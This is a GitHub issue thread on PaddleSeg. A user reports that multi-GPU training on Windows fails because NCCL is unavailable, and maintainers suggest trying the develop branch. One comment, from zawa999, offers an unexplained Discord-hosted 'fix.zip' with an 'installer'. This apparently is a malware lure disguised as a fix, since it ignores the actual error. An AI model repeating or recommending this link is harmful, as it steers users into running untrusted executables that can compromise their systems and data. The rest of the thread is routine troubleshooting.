### ISSUE TITLE
由于Windows环境下不支持nccl，所以无法使用多卡训练。

### ISSUE THREAD

**Issue by nothingws** [PaddlePaddle/PaddleSeg#3794]
### 问题确认 Search before asking

- [X] 我已经搜索过问题，但是没有找到解答。I have searched the question and found no related answer.

### 请提出你的问题 Please ask your question

现在paddlese还是不支持在win10系统下，进行多gpu训练吗？测试的时候报错如下、
Traceback (most recent call last):
  File "tools\train.py", line 201, in <module>
    main(args)
  File "tools\train.py", line 176, in main
    train(
  File "d:\pycharmprojects\paddleseg-release-2.8\paddleseg\core\train.py", line 140, in train
    paddle.distributed.fleet.init(is_collective=True)
  File "C:\ProgramData\Anaconda3\lib\site-packages\paddle\distributed\fleet\fleet.py", line 287, in init
    paddle.distributed.init_parallel_env()
  File "C:\ProgramData\Anaconda3\lib\site-packages\paddle\distributed\parallel.py", line 1101, in init_parallel_env
    pg = _new_process_group_impl(
  File "C:\ProgramData\Anaconda3\lib\site-packages\paddle\distributed\collective.py", line 157, in _new_process_group_impl
    pg = core.ProcessGroupNCCL.create(
AttributeError: module 'paddle.base.libpaddle' has no attribute 'ProcessGroupNCCL'

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by zhangyubo0722** [comment]
切换到PaddleSeg的develop分支试一下，以及使用的是什么版本的paddle呢

**Comment by nothingws** [comment]
> 切换到PaddleSeg的develop分支试一下，以及使用的是什么版本的paddle呢
这个版本paddlepaddle-gpu                   2.6.1.post116

**Comment by zhangyubo0722** [comment]
嗯嗯先试一下develop分支吧

**Comment by TingquanGao** [comment]
The issue has no response for a long time and will be closed. You can reopen or new another issue if are still confused.

---
_From Bot_
